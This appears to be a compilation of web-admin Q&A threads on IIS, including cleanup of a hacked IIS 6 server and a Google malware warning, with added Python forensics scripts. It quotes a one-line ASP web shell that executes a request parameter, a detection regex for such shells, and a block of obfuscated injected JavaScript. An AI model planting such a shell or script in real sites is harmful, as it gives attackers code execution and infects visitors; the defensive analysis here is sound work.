I think I've been hacked and am looking for advice - iis-6

One of my clients noticed a message in Google search results that said their website may have been hacked. After some digging, I found HTML files on the server that contained SEO garbage and JavaScript references. I removed those files, changed CMS passwords, updated some components like CKFinder, etc.
I then started looking into other sites on the server and found tons of .asp files with this line:
<%If Request("cmp")<>"" Then Execute(Request("cmp"))%>nofoundfile
I've removed those but do not know how they got there. I've looked through various logs (Event Viewer, website, FTP) but most don't go back far enough to when the files were created.
I've updated the OS, which was only a month or two out of date, and changed FTP access.
What else can I do to find the point of entry or make sure my server and sites are safe?
BTW: This is a Windows 2003 server running IIS 6.0.

There are multiple ways they may have gotten access to your server.
Are you running a common CMS or a custom one?
It is possible that they found a vulnerability in one of your scripts.
For example, if they found a SQL injection vulnerability they could retrieve database information.
If they were to find an RCE (remote code execution) bug, they may have been able to execute system commands, leading to the creation of those arbitrary files.
Other than that, there are a few vulnerabilities in Windows Server that have been patched this week; check out this link:
http://blog.spiderlabs.com/2014/02/microsoft-patch-tuesday-february-2014.html
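The poster's real problem is finding the point of entry after the shells have already been removed. The script below is an added example (not code from the question or the answer): it recognises the `Execute(Request("..."))` shell pattern in files IIS 6 hands to asp.dll, parses IIS W3C extended logs using their own `#Fields:` header, pulls out every request that hit a shell file or passed the shell's `cmp` parameter, and then lists what each of those client IPs did before its first shell hit. That pre-shell activity is the shortlist of entry points to look at. The log lines, the `/cms/...` paths and the shell location are constructed for the demo and are not taken from the original post; only the shell one-liner and the `cmp` parameter name come from the question.

```python
"""Hunt for the ASP "Execute(Request(...))" shell and the requests that used it."""
import re
from collections import defaultdict
from pathlib import Path

# Classic-ASP one-liner shells hand a request parameter straight to the script
# engine. Group 2 captures the parameter name (the OP's shell uses "cmp").
SHELL_RE = re.compile(
    r"""(?i)\b(execute|executeglobal|eval)\s*\(\s*request"""
    r"""(?:\.(?:form|querystring|item))?\s*\(\s*["']([^"']+)["']\s*\)\s*\)"""
)
# Extensions IIS 6 maps to asp.dll by default; a shell in any of them executes.
ASP_SUFFIXES = {".asp", ".asa", ".cdx", ".cer"}

def find_shell_params(text):
    """Parameter names fed to Execute/Eval in one file; empty list if it looks clean."""
    return [m.group(2) for m in SHELL_RE.finditer(text)]

def scan_webroot(root):
    """{file path: [param, ...]} for every ASP-handled file under root that looks like a shell."""
    hits = {}
    for p in Path(root).rglob("*"):
        if p.suffix.lower() in ASP_SUFFIXES and p.is_file():
            params = find_shell_params(p.read_text(errors="replace"))
            if params:
                hits[str(p)] = params
    return hits

def parse_w3c(lines):
    """Records from IIS W3C extended log lines; column names come from the #Fields header."""
    fields = None
    for line in lines:
        line = line.rstrip("\r\n")
        if not line:
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = line.split()[1:]
            continue
        parts = line.split(" ")  # W3C logging encodes spaces inside a field as '+'
        if fields and len(parts) == len(fields):
            yield dict(zip(fields, parts))

def shell_requests(records, shell_stems, params=("cmp",)):
    """Requests that hit a known shell path or carry a shell parameter in the query string."""
    stems = {s.lower() for s in shell_stems}
    names = {p.lower() for p in params}
    out = []
    for r in records:
        query = r.get("cs-uri-query", "-")
        qnames = {kv.split("=", 1)[0].lower() for kv in query.split("&")} if query != "-" else set()
        if r.get("cs-uri-stem", "").lower() in stems or qnames & names:
            out.append(r)
    return out

def entry_point_candidates(records, shell_hits):
    """Per attacker IP, everything it requested before its first shell hit: the entry-point shortlist."""
    first = {}
    for r in shell_hits:
        stamp = r["date"] + " " + r["time"]
        if r["c-ip"] not in first or stamp < first[r["c-ip"]]:
            first[r["c-ip"]] = stamp
    before = defaultdict(list)
    for r in records:
        ip = r["c-ip"]
        if ip in first and r["date"] + " " + r["time"] < first[ip]:
            before[ip].append((r["cs-method"], r["cs-uri-stem"], r["cs-uri-query"], r["sc-status"]))
    return dict(before)

# Constructed sample data: the OP's shell line, plus an IIS 6 log with hypothetical
# /cms/... endpoints and a hypothetical shell location. Not taken from the original post.
SAMPLE_SHELL = '<%If Request("cmp")<>"" Then Execute(Request("cmp"))%>nofoundfile'
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2014-02-10 00:00:01
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2014-02-10 00:00:01 10.0.0.5 GET /default.asp - 80 - 198.51.100.7 Mozilla/5.0 200 0 0
2014-02-10 00:00:09 10.0.0.5 GET /cms/login.asp - 80 - 203.0.113.44 Mozilla/4.0 200 0 0
2014-02-10 00:00:15 10.0.0.5 POST /cms/fileupload.asp - 80 - 203.0.113.44 Mozilla/4.0 200 0 0
2014-02-10 00:00:21 10.0.0.5 GET /userfiles/x.asp cmp=Response.Write(1) 80 - 203.0.113.44 Mozilla/4.0 200 0 0
2014-02-10 00:00:40 10.0.0.5 POST /userfiles/x.asp - 80 - 203.0.113.44 Mozilla/4.0 200 0 0
2014-02-10 00:01:02 10.0.0.5 GET /images/logo.gif - 80 - 198.51.100.7 Mozilla/5.0 200 0 0
"""

if __name__ == "__main__":
    print("shell params:", find_shell_params(SAMPLE_SHELL))
    recs = list(parse_w3c(SAMPLE_LOG.splitlines()))
    hits = shell_requests(recs, ["/userfiles/x.asp"])
    for ip, reqs in entry_point_candidates(recs, hits).items():
        print(ip, "before first shell hit:", reqs)
```

Two caveats a practitioner will hit: IIS logs record the query string but never the POST body, so a shell driven purely over POST only shows up as repeated POSTs to an odd file with no query, which is why the path match is there alongside the parameter match; and the result is only as good as log retention, so if the W3C logs do not reach back to the file creation dates the same correlation has to be run against whatever does (FTP logs, the NTFS creation timestamps on the shells, backups of the log directory).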

Where am I missing an IP address in the connection string of my web application?

Ok,
First of all, I want to make the disclaimer that aside from some HTML I have done very little programming in my lifetime. However, as necessity so often dictates, I am in dire need of some assistance with that very thing at this moment.
Our agency has a web site that is hosted by another entity, and that entity is forcing our hand in moving the content of that site onto one of our own servers. All content has been moved to the new server, and all database tables from the old database have been moved onto our internal SQL server. The site primarily consists of asp files, but there is one page that is aspx. The problem arises when taking the "old" database tables offline and testing the aspx page. Even though all instances of the IP address to the old SQL server have been changed to reflect the IP of the new SQL server, the aspx page insists on requiring the connection to the old database (the error indicates the tables are offline, thus pointing to the old SQL server). Everything else works as it should, and the "Web Application" has been designated as such in IIS.
I know I am missing something somewhere... but I just can't put my finger on it. Any ideas would be greatly appreciated. I'm starting to wonder if the reference to the old IP address is compiled in a file somewhere that I just can't find.
Thanks
Ok guys, I found my solution. For programmers, this solution probably would have been a no-brainer, but for others maybe not so much.
I have to give a pat on the back to "Creator" for pointing me in the direction of the project file. I wasn't sure that it was still available, but thankfully the programmer who designed this application a little over ten years ago was nice enough to leave it in the web directory with everything else.
What I wound up doing was as follows:
Opened the project file in Visual Studio 2010 and converted the project from 2003 to 2010.
Added the connection strings into the web.config to the new SQL server.
Right clicked on each item and excluded all of the old pieces of the application (in Solution Explorer) that were no longer needed.
Right clicked on the project and navigated to Package/Publish Settings > Package/Publish SQL and chose to "Import from Web.config".
Saved the project, then right clicked and "Converted to Web Application".
Right clicked and performed a "Build". I'm guessing this re-wrote the dll file.
Copied the directory and needed files back over to the web server and converted the directory in IIS to a Web Application.
Sat back and marveled at my success.
Thank you guys for pointing me the right direction!

IIS Remote Manager is missing icons for a specific site

I have a developer that came to me with an issue. He is remotely managing one of his sites on one of our development servers and all of a sudden he lost all of the icons in IIS for this specific site.
All other sites display his icons correctly, and when I have him test on another computer everything displays correctly. So what could have gone wrong on his machine? It was working but is now not working. Any help here would be greatly appreciated. Never seen this before and can't seem to figure out what caused it to just go away. There should be so many more options for him. Plus, if you could see it, he lost the ability to see the folders on this site also. And it is every site on this server. But like I said, it is just on his computer; if he goes to a different computer he has access to everything.
Guess I can't post a picture, but if you need to see what I am talking about I can send it to you.
Come to find out he was ignoring the prompt he was getting saying that there were new versions of the tools on the server to download to his machine. He just hit Cancel instead of selecting them and hitting OK to install the DLLs and enable them.

How to properly configure application in Live Connect and project in Visual Studio 2013

My question here is pretty simple: how to properly (and 100%) configure both Live Connect and the project in Visual Studio 2013 so that the local application runs and authenticates a user properly against a Microsoft account.
My question may be simple, but the answer is most likely not as simple. I've been reading countless articles and possible tutorials about this, but they are all fragmented and divided into small parts that do not really reconcile with each other.
So below is the situation, better described, with the steps I have followed.
[Steps Followed]
1) I have created a simple MVC application using Visual Studio 2013.
2) I have configured the project (using its properties) to use IIS Express with current Project Url : https://localhost:44302/
The project runs quite well, and external authentication with Facebook, Google and Twitter run very well too. Now for the tricky part:
3) I have created an account with Microsoft and successfully created an application in the Live Connect Developer Center.
4) Since configuring the Redirect URLs field to a simple http://localhost:<port> will not work (well... just because they didn't want it to, I suppose), I have additionally done the following:
5) Mapped in hosts file the following domain to localhost: # 127.0.0.1 mytestdomain.localtest.me
6) Reconfigured in Live Connect the Redirect URLs field to use the newly mapped domain: http://mytestdomain.localtest.me (although I have tried this with or without the port as well).
[End result]
With this configuration, the site runs properly locally. However, when I try to sign in with Microsoft account credentials (so, when I click the "Microsoft" button), I am redirected and receive the following message:
"We're unable to complete your request
Microsoft account is experiencing technical problems. Please try again later."
I honestly do not understand why this wouldn't work, when a couple of articles suggested that doing these specific steps would make it work.
What can I be missing, why would this happen at all?
If someone can write here what I am missing, we could all join efforts and create in this topic a full-fledged, 100% working configuration for local application testing with Microsoft authentication; I believe it would help everyone. If such a topic already exists and you can point me to it (because clearly I have missed it), that would also be great.
Thank you in advance,
Mad
Actually I just found out a proper and direct answer to my question. I totally missed it somehow during the last few days of research.
Microsoft's blog has all you need to make it work, and now mine does too. No big explanations and discussions, just basic and direct step by step article.
For those who could not find it and stumbled upon my topic here on StackOverflow, here is the link. Follow it word for word, and it will work.
Answer : Configuring your ASP.NET application for Microsoft OAuth account

Malware on the site as per google but I cannot find it

Yesterday when I came to one of my sites I got a warning from Google that there is malware on my site. I looked at the code and there was indeed some JavaScript that shouldn't be there. I googled it and didn't find anything useful. When I came back to my site, that code was gone, but Google (when accessing the site from the search engine) and Google Chrome still give me a warning that there is malware on my site.
I looked at Webmaster Tools and they have identified a few pages as problematic. One of them is http://www.keramikfliesen.com/schweiz/rimini/. The code listed in Webmaster Tools under Malware is:
<script type='text/javascript'>st="no3nen0orno3pno3rxstxpno3
rxnl";Date&&(a=["a#%d]%b#%e_%c)%1<%5*%4+%9:%3^%2","%7!%0|%f~
%8?%6&"]);var b=[],c="&!^<^]$$&)&~&_&)!:$$^#$|&:&&$?$]^<^]^]
&+&~&^!*&]&*&_!+$_&^&~&~&#&:&*$_&:&_&+&*!?+~&&$?&!^<$:$:!#!?
^+^]^!^$+*^&^#!&&<!$$|&^^]&_&*!!$|++&<!+&*^#&^$_!^&*!+*+&:&]
&*$?&^$_&!&*!+*+&:&]&*$?$:$:^#&*&+^]&_&*!!$|++&<!+&*$?&^$_&!
&*!+*+&:&]&*$?$:$#!?^+$:^#&+&~&^!*&]&*&_!+$_&^&~&~&#&:&*^]&!
^<$#$$^]$$$#&*!^&^&<!|&*$?&*&+$_!+&~+!+]*+*^!+!$&:&_&!$?$:$:
$#$$^#&*!?!|&:!$&*!^^]$$$#&*&+$_!+&~+!+]*+*^!+!$&:&_&!$?$:$#
$$^#!|&<!+&?^]$~$$^#&!^^^]$$&?!+!+!|^#$~$~$$$#!^!+$_!$&*!|&)
&<&^&*$?$~&*&_^|$~&!$)$$&!$$$:$_!$&*!|&)&<&^&*$?$~&_&~^^$~&!
$)$$&*$$$:$_!$&*!|&)&<&^&*$?$~!|&*!$!?$~&!$)$$$_$$$:$#$$$~!+
&~!|^$$_&?!+&]&)$$^#!&&<!$$|&+^]$]^<$<^]&_&<!&&:&!&<!+&~!$$_
!*!^&*!$+<&!&*&_!+$_!+&~+)&~!!&*!$+^&<!^&*$?$:$_&:&_&+&*!?+~
&&$?$$&&&:!$&*&&&~!?$$$:$)&*^]$$^<$$$)&?^]&&!*&_&^!+&:&~&_$?
$:!#!]^#&?$_!|!$&~!+&~!+!:!|&*^]!#&$^#&&!*&_&^!+&:&~&_$?$:!#
!$&*!+!*!$&_$|&!^^!]$)&<^#&&!*&_&^!+&:&~&_$?$:!#!&&<!$$|&&^]
&+&~
Can you please help me out? How should I fight this?
Thank you all very much for your help in advance!
Remove the malware from your web pages.
Immediately change your passwords.
Also check for any XSS (cross-site scripting) and SQL injection vulnerabilities.
Deactivate plugins that are not highly ranked or not from a reputable source.
Use secure protocols. Check out StopBadware.org's Tips for Cleaning and Securing Your Website.
Keep an eye on your log files.
Stay up to date with the latest software updates and patches.
Hope it helps!
If the code appears again, then the attacker left some script which, on request, runs the infecting procedure. Usually this script receives an encoded string of the malcode (e.g. in base64), decodes it and executes it via eval(). You should find this file (it is most likely a PHP script) and remove it. To find it, look at the log and search for suspicious requests (e.g. a single POST request transmitting a base64 string is a very suspicious one).
Most probably your hosting has been compromised (password stolen) by an automated tool.
These tools typically inject some JavaScript inside JS files in order to infect the people visiting your pages with malware. You should:
Change your passwords.
Restore the most recent non-compromised backup.
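The two answers above boil down to "the injection comes back because something on the server keeps re-writing it" and "go back to a clean backup". Both become much easier when the clean backup is used as a baseline rather than just restored over the top: hash every file in the backup, hash every file in the live tree, and the modified and added files are the complete list of places an attacker touched, including any dropper that re-injects the script. The code below is an added example written for this thread, not part of any answer. It also extracts, for each modified HTML/PHP/JS file, the `<script>` blocks that the clean copy never had, so the injected payload can be reported and searched for elsewhere. The fixtures are constructed: the `schweiz/rimini/` path is from the question, but the page content, the `uploads/stat.php` dropped file and the script body are placeholders, not the code from the post.

```python
"""Diff a live web root against a known-clean backup and pull out injected <script> blocks."""
import hashlib
import re
import tempfile
from pathlib import Path

SCRIPT_RE = re.compile(r"<script\b[^>]*>.*?</script>", re.I | re.S)
TEXT_SUFFIXES = {".html", ".htm", ".php", ".js", ".asp", ".aspx"}

def manifest(root):
    """{relative posix path: sha256} for every regular file under root."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in root.rglob("*") if p.is_file()}

def diff_trees(clean, live):
    """(added, modified, missing) relative paths; only added/modified files can carry an injection."""
    added = sorted(set(live) - set(clean))
    missing = sorted(set(clean) - set(live))
    modified = sorted(p for p in set(clean) & set(live) if clean[p] != live[p])
    return added, modified, missing

def injected_scripts(clean_text, live_text):
    """Script blocks in the live file that the clean copy never had: the payload to report."""
    known = set(SCRIPT_RE.findall(clean_text))
    return [s for s in SCRIPT_RE.findall(live_text) if s not in known]

def compare(clean_root, live_root):
    """Full report: tree differences plus, for each modified text file, the scripts that were added."""
    clean, live = manifest(clean_root), manifest(live_root)
    added, modified, missing = diff_trees(clean, live)
    injected = {}
    for rel in modified:
        if Path(rel).suffix.lower() in TEXT_SUFFIXES:
            new = injected_scripts((Path(clean_root) / rel).read_text(errors="replace"),
                                   (Path(live_root) / rel).read_text(errors="replace"))
            if new:
                injected[rel] = new
    return {"added": added, "modified": modified, "missing": missing, "injected": injected}

# Constructed fixtures: a two-file site, and its live copy with one appended script and
# one dropped file. The script body is a placeholder, not the code from the original post.
LEGIT_PAGE = '<html><head><script src="/js/site.js"></script></head><body>Rimini</body></html>\n'
FAKE_PAYLOAD = "<script type='text/javascript'>/* constructed stand-in for injected code */var st=1;</script>"

def _write(root, rel, text):
    p = Path(root) / rel
    p.parent.mkdir(parents=True, exist_ok=True)
    p.write_text(text)

def demo():
    """Build the fixtures in temp dirs and return compare()'s report."""
    with tempfile.TemporaryDirectory() as clean, tempfile.TemporaryDirectory() as live:
        for root in (clean, live):
            _write(root, "schweiz/rimini/index.html", LEGIT_PAGE)
            _write(root, "js/site.js", "document.title = 'ok';\n")
        _write(live, "schweiz/rimini/index.html", LEGIT_PAGE.replace("</body>", FAKE_PAYLOAD + "</body>"))
        _write(live, "uploads/stat.php", "<?php /* constructed stand-in for a dropped file */ ?>\n")
        return compare(clean, live)

if __name__ == "__main__":
    report = demo()
    for key in ("added", "modified", "missing"):
        print(key, report[key])
    for rel, scripts in report["injected"].items():
        print(rel, "->", scripts)
```

Run `compare()` against the real backup and live document root rather than `demo()`. Anything in `added` that the CMS did not legitimately create (uploads excepted) is a candidate for the dropper the second answer describes, and the `injected` entries give the exact strings to grep the server's other sites for. Hashing whole files rather than just looking for `<script>` also catches the case from the third answer, where the payload is appended to existing `.js` files and would never appear as a script tag.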

On-demand virus scanning Windows

I want to scan files a user uploads to our websites on the server side. I'd prefer something we can run on demand that doesn't have to be running all the time on the server. What solutions are available for Windows Server 2008 R2? Which products specifically would you recommend?
If I were in your situation, I would script up a solution to call ClamAV on the file whenever you receive it. For Windows, if you are running IIS (or any web framework) there is probably some sort of callback on file reception you can plug this into.
Almost all antivirus programs provide a command-line version (or startup parameters) to scan just one file or a directory.
There are several on-demand scanners; there is a list named "Probably the Best Free Security List in the World" which lists a few. Sorry, I cannot provide the link because StackOverflow limits the number of hyperlinks new users can post.
Although not in that list, one of the best I've used is F-Prot Antivirus, and it seems it runs well on Windows Server 2008:
https://forum.f-prot.com/index.php?topic=1691.0
Cheers
For your case the best solution would be using http://www.virustotal.com/